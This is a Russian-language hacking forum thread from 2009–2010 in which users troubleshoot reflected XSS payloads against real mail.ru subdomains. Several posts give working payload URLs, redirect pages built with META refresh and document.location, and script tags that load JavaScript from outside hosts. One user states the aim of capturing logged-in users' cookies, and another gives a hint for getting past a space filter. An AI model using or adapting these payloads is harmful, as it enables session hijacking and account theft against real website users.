Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Вопрос по пассивной XSS (https://forum.antichat.xyz/showthread.php?t=164780)

maxim_mm 20.12.2009 01:54

Вопрос по пассивной XSS
 
12 декабря, в теме пассивные XSS - выложена вот такая пасивка
Код:

http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E
создаю index.html с таким содержимым
Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>
файл js.js
Код:

alert(/bla bla bla/)
По идее ведь, при попадании на мою страничку - должна сработать эта пасивка и запустится этот тестовый скриптик.

А он почему то не запускается...

P.S. пробую это первый раз...

Root-access 20.12.2009 13:16

Там фильтрация на пробелы - они заменяются на нижний прочерк.

maxim_mm 21.12.2009 00:40

создаю index.html с таким содержимым
Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3C/script%3E'> </head> </html>

заменил на
Код:

<html> <head> <META HTTP-EQUIV='Refresh' content ='0; URL= http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript src=%22http://test23.1gb.ru/js.js%22%3E%3C/script%3E'> </head> </html>
А то у меня там > не закрывалась после <script...

А с фильтрацией пробела.. заменить пробел на _ в тексте?
Попробовал. скрипт не выполнился... ну или я не увидел его выполнения...

Когда пишу скрипт внутри тэгов <script> </script> все работает... ставлю внешний - не работает. что еще я могу не так делать?

maxim_mm 22.12.2009 22:11

Разобрался)

pitter 26.02.2010 13:05

У меня вопрос вот есть пассивка
http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
Работает она токо у авторизованных
Почему она не присылает куки
со всеми остальными пассивками все работает

в index.php прописываю
<script>document.location.href="http://11x11.mail.ru/tournaments/414252/act=join&%27%3E%3C%27%27%3E%22%3E%3Cscript%20src=% 22http://wowvk.ru/js.js%22%3E%3C/script%3E"</script>


Время: 17:00